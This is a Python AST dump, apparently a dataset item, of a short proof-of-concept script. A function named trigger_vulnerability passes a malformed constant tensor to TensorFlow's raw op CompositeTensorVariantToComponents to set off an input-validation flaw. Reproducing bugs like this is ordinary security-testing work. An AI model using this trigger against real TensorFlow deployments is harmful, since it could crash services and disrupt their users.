Module(
    body=[
        Import(
            names=[
                alias(name='tensorflow', asname='tf')]),
        FunctionDef(
            name='trigger_vulnerability',
            args=arguments(
                posonlyargs=[],
                args=[
                    arg(arg='encoded')],
                kwonlyargs=[],
                kw_defaults=[],
                defaults=[]),
            body=[
                Return(
                    value=Call(
                        func=Attribute(
                            value=Attribute(
                                value=Name(id='tf', ctx=Load()),
                                attr='raw_ops',
                                ctx=Load()),
                            attr='CompositeTensorVariantToComponents',
                            ctx=Load()),
                        args=[
                            Name(id='encoded', ctx=Load())],
                        keywords=[]))],
            decorator_list=[]),
        Assign(
            targets=[
                Name(id='invalid_encoded', ctx=Store())],
            value=Call(
                func=Attribute(
                    value=Name(id='tf', ctx=Load()),
                    attr='constant',
                    ctx=Load()),
                args=[
                    List(
                        elts=[
                            Constant(value=1),
                            Constant(value=2),
                            Constant(value=3)],
                        ctx=Load())],
                keywords=[])),
        Assign(
            targets=[
                Name(id='components', ctx=Store())],
            value=Call(
                func=Name(id='trigger_vulnerability', ctx=Load()),
                args=[
                    Name(id='invalid_encoded', ctx=Load())],
                keywords=[]))],
    type_ignores=[])